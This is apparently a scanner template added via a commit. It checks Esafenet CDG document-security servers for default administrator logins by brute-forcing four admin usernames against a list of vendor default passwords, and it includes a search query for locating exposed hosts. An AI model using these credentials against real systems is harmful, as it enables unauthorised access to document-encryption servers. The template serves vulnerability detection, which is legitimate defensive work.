Add files via upload

http/default-logins/esafenet-cdg-default-login.yaml

@@ -0,0 +1,52 @@
+id: esafenet-cdg-default-login
+
+info:
+  name: Esafenet CDG - Default Login
+  author: chesterblue
+  severity: high
+  description: |
+    esafenet electronic document security management system (abbreviation: CDG) is an electronic document security encryption software.CDG contains a default login vulnerability.
+  metadata:
+    verified: "true"
+    fofa-query: "esafenet"
+  tags: esafenet,cdg,default-login
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/CDGServer3/SystemConfig"
+    headers:
+      content-type: application/x-www-form-urlencoded
+    body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
+
+    attack: clusterbomb
+    payloads:
+      username:
+        - "systemadmin"
+        - "configadmin"
+        - "secadmin"
+        - "docadmin"
+      password:
+        - "Est@Spc820"
+        - "12345678"
+        - "123456"
+        - "Est@Spc2018"
+        - "Est@Spc2019"
+        - "Est@Spc2020"
+        - "Est@Spc2021"
+        - "Est@Spc2022"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "est.connection.url"
+
+      - type: regex
+        regex: 
+          - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
+        part: body
+
+      - type: status
+        status:
+          - 200